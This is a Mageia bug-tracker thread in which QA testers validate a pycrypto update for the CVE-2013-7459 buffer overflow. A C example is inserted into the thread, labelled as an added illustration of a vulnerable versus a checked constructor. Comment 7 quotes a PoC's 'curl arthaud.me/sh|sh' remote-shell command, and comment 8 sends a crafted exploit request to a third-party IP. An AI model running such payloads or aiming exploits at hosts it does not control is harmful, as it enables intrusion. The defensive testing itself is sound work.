| Summary: | python-pycrypto new security issue CVE-2013-7459 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | ||
| Priority: | Normal | CC: | lewyssmith, makowski.mageia, sysadmin-bugs, tarazed25 |
| Version: | 5 | Keywords: | validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | https://lwn.net/Vulnerabilities/710478/ | ||
| Whiteboard: | MGA5-64-OK MGA5-32-OK advisory | ||
| Source RPM: | python-pycrypto-2.6.1-8.mga6.src.rpm | CVE: | CVE-2013-7459 |
| Status comment: | |||
| Attachments: | Random output test for python[3]-pycrypto (attachment 8841); POC for this bug, Python script to get a remote shell (attachment 8842) | ||
Description
David Walser
2016-12-27 19:34:34 CET

David Walser
2016-12-27 19:34:44 CET
Whiteboard: (none) => MGA5TOO

Comment 1

python-pycrypto-2.6.1-6.1.mga5
python3-pycrypto-2.6.1-6.1.mga5

from python-pycrypto-2.6.1-6.1.mga5.src.rpm are in 5/core/updates_testing

This is a security fix for a possible buffer overflow.

ref:
http://openwall.com/lists/oss-security/2016/12/27/8
https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4
https://marc.info/?l=oss-security&m=148280482630855&w=2

Cauldron is also patched.

The rpm has its own test suite, run during the build, including for this issue.

Whiteboard: MGA5TOO => (none)
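The class of bug behind CVE-2013-7459 is a heap-based overflow in the cipher constructor (ALGnew in pycrypto's C block template): a caller-supplied IV is copied into a fixed block-size buffer inside the heap-allocated cipher object. The example below is added here for illustration and is not pycrypto's own code or the referenced upstream patch; it shows the unchecked copy beside a hardened constructor that validates the mode and the IV length before touching the buffer. The mode numbers, the struct layout, the error strings and the helper iv_accepted() are all hypothetical; the mode-42 case is included only because the PoC URL later on this page passes mode=42, and the example makes no claim about how pycrypto itself handled that value.

```c
/*
 * Added illustrative example (not pycrypto's code): a cipher object whose IV
 * lives in a fixed BLOCK_SIZE array, built either by an unchecked constructor
 * (the vulnerable pattern) or by a checked one (the hardened pattern).
 * Mode numbers below are hypothetical, chosen for this example only.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 16

enum { MODE_ECB = 1, MODE_CBC = 2, MODE_CTR = 6 };  /* hypothetical values */

typedef struct {
    int mode;
    unsigned char IV[BLOCK_SIZE];  /* fixed-size buffer: the overflow target */
    int counter;                   /* whatever follows IV is what gets clobbered */
} cipher_t;

/* Vulnerable pattern: ivlen is never compared with sizeof(c->IV) before the
 * copy, so an IV longer than BLOCK_SIZE writes past the array into the rest
 * of the heap allocation. Deliberately not exercised with an overlong IV in
 * this example, since that is undefined behaviour. */
cipher_t *alg_new_unchecked(int mode, const unsigned char *iv, size_t ivlen)
{
    cipher_t *c = calloc(1, sizeof *c);
    if (!c) return NULL;
    c->mode = mode;
    memcpy(c->IV, iv, ivlen);      /* no bound on ivlen */
    return c;
}

/* Hardened pattern: reject unknown modes, reject an IV for modes that do not
 * use one, and require exactly BLOCK_SIZE bytes otherwise, all before any
 * memory is allocated or copied. Returns NULL and sets *err on rejection. */
cipher_t *alg_new_checked(int mode, const unsigned char *iv, size_t ivlen,
                          const char **err)
{
    if (mode != MODE_ECB && mode != MODE_CBC && mode != MODE_CTR) {
        *err = "unknown cipher feedback mode";
        return NULL;
    }
    if (mode == MODE_ECB || mode == MODE_CTR) {
        if (ivlen != 0) {
            *err = "IV must not be used with ECB or CTR modes";
            return NULL;
        }
    } else if (ivlen != BLOCK_SIZE) {
        *err = "IV must be BLOCK_SIZE bytes long";
        return NULL;
    }
    cipher_t *c = calloc(1, sizeof *c);
    if (!c) {
        *err = "out of memory";
        return NULL;
    }
    c->mode = mode;
    if (ivlen) memcpy(c->IV, iv, ivlen);  /* ivlen is now known to fit */
    *err = NULL;
    return c;
}

/* Convenience wrapper: 1 if the checked constructor accepts (mode, ivlen),
 * 0 if it rejects. Uses a constructed all-zero sample IV of up to 64 bytes. */
int iv_accepted(int mode, size_t ivlen)
{
    unsigned char sample_iv[64] = {0};  /* constructed sample input */
    const char *err = NULL;
    if (ivlen > sizeof sample_iv) return 0;
    cipher_t *c = alg_new_checked(mode, sample_iv, ivlen, &err);
    int ok = (c != NULL);
    free(c);
    return ok;
}

int main(void)
{
    printf("CBC, 16-byte IV:     %s\n", iv_accepted(MODE_CBC, 16) ? "accepted" : "rejected");
    printf("CBC, 24-byte IV:     %s\n", iv_accepted(MODE_CBC, 24) ? "accepted" : "rejected");
    printf("ECB, 16-byte IV:     %s\n", iv_accepted(MODE_ECB, 16) ? "accepted" : "rejected");
    printf("mode 42, 16-byte IV: %s\n", iv_accepted(42, 16) ? "accepted" : "rejected");
    return 0;
}
```

The point of the ordering in alg_new_checked is that every check happens before calloc and memcpy, so a rejected request leaves no partially initialised object behind; the unchecked version is kept only so the two can be read side by side.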
David Walser
2017-01-03 20:34:16 CET
URL: (none) => https://lwn.net/Vulnerabilities/710478/

Comment 2 (lewyssmith)

Prior to testing. The most recent python-pycrypto bug: https://bugs.mageia.org/show_bug.cgi?id=11491#c0 has some code for *that* problem which I shall attach here simply because it uses the same package. The output (after that old update) should be random.

https://marc.info/?l=oss-security&m=148280482630855&w=2 is a fantastically detailed & precise analysis of the bug, with a code exploit which I also will attach here. More 'for the record', since it concludes: "After a few hours, I finally got a shell!"

CC: (none) => lewyssmith

Comment 3 (lewyssmith)

Created attachment 8841 [details]
Random output test for python[3]-pycrypto

From bug 11491, this is just a little python script which uses the python-pycrypto package. The 4 lines of output should be random.
$ python[3] cryptoRandom.py

Comment 4 (lewyssmith)

Created attachment 8842 [details]
POC for this bug, Python script to get a remote shell.

From https://marc.info/?l=oss-security&m=148280482630855&w=2 for info only. Written for Python3; may work for earlier. Expect it to run for hours before (pre-update only) giving a shell.

Comment 5 (lewyssmith)

Testing M5_64

BEFORE update: python-pycrypto-2.6.1-6.mga5 python3-pycrypto-2.6.1-6.mga5
$ python cryptoRandom.py
[u'11ebfa07b917df5b,1643424639ad0df8', u'1c75461b81e3808f,7476bd90682ace47', u'3de101081f86ac97,514d5e1c4abb325e', u'c62efc43f35b0b0b,14799ad508334985']
$ python3 cryptoRandom.py
[similar sort of O/P]

AFTER update: python-pycrypto-2.6.1-6.1.mga5 python3-pycrypto-2.6.1-6.1.mga5
$ python cryptoRandom.py
[similar sort of correct O/P as previously]
$ python3 cryptoRandom.py
[similar sort of correct O/P as previously]

So the package still works, although its long POC was not specifically tested. From Comment 1: "rpm have it own test suite run during the build, including for this issue." OK.

Whiteboard: (none) => MGA5-64-OK

Comment 6 (lewyssmith)

Advisory created from Comment 1, title, the references.

Whiteboard: MGA5-64-OK => MGA5-64-OK advisory

Comment 7 (Len Lawrence, tarazed25)

Testing on i586 virtualbox.
Thanks for the upload Lewis.
Before updating:
$ python cryptoRandom.py
[u'42364207b0dce3c2,29364e940c3c17c9',
u'50a9812b90741463,3035440668d34d67',
u'e8bfa75fdf36ad24,d2678147321a44a6',
u'f2480379ff1dddac,64aba216bbe90636']
$ python3 cryptoRandom.py
['050e5d799b3ab7c8,26529743331d7995',
'1d1bfaea7011db37,63d5549433c22325',
'86c19227a42ef910,88527138e99cfe25',
'a5a45316ae36ed16,9197abb3d58ed85b']
Running 'python getShell.py' fails on a syntax error.
Noting that the original was written for python3 I tried
$ python3 getShell.py
The syntax was accepted but the terminal filled with hundreds of echoes of the 'curl arthaud.me/sh|sh' command and ended on a connection failure:
curl%20arthaud.me%2fsh%7csh%00%00%00%d6%80%15%08 (Caused by ProtocolError('Connection aborted.', ConnectionRefusedError(111, 'Connection refused')))
I wonder if the address targeted needs to be changed to something accessible. No clue really.
$ dig 136.243.194.56
did not provide any useful information.
$ nslookup 136.243.194.56
Server: 192.168.1.1
Address: 192.168.1.1#53
Non-authoritative answer:
56.194.243.136.in-addr.arpa name = ip-136-243-194-56.bb.netbynets.de.
Maybe a German broadband provider?
Worth trying after the update though.

CC: (none) => tarazed25

Comment 8 (Len Lawrence, tarazed25)

After the update the functionality test worked fine as before, with python and python3.

The PoC test with python3 behaved just as before, with a final "Connection refused". Should the attempt to get a remote shell have been thwarted immediately if the fix had worked? I defer to a higher authority.

Also tried this:
$ curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg=AAAAAAAAAAAAAAAA&keyAAAAAAAAAAAAAAAA&mode=42&iv=AAAAAAAAAAAAAAAA"
curl: (7) Failed to connect to 136.243.194.56 port 8000: Connection refused

Comment 9 (makowski.mageia)

(In reply to Len Lawrence from comment #8)
> After the update the functionality test worked fine as before, with python
> and python3.

so you can validate

> The PoC test with python3 behaved just as before with a final "Connection
> refused".
> Should the attempt to get a remote shell have been thwarted immediately if
> the
> fix had worked? I defer to a higher authority.

the security issue is tested during the rpm build.

CC: (none) => makowski.mageia

Comment 10 (Len Lawrence, tarazed25)

Thanks Philippe. Letting it go then.
Len Lawrence
2017-02-01 21:52:39 CET
Keywords: (none) => validated_update

Comment 11

An update for this issue has been pushed to the Mageia Updates repository.
http://advisories.mageia.org/MGASA-2017-0032.html

Resolution: (none) => FIXED